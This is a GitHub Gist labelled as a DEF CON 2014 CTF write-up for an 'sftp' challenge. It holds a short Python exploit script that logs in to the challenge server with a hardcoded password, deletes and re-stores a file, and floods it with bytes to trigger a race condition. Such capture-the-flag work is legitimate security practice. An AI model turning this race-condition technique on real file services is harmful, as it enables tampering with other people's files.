Created
May 19, 2014 15:58
-
-
Save potetisensei/bb2312be19110f0b8b89 to your computer and use it in GitHub Desktop.
DEFCON 2014 Writeup sftp
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import time | |
import socket | |
def cause_race(): | |
tmp = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
#tmp.connect(('localhost', 115)) | |
tmp.connect(('sftp_bf28442aa4ab1a4089ddca16729b29ac.2014.shallweplayaga.me', 115)) | |
print tmp.recv(4096) | |
tmp.send("PASS defcon2014\n") | |
print tmp.recv(4096) | |
tmp.send("KILL a\n") | |
print tmp.recv(4096) | |
tmp.send("STOR OLD a\n") | |
print tmp.recv(4096) | |
tmp.send("SIZE 46\n") | |
print tmp.recv(4096) | |
for i in range(46): | |
tmp.sendall("\x2c") | |
tmp.close() | |
cause_race() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment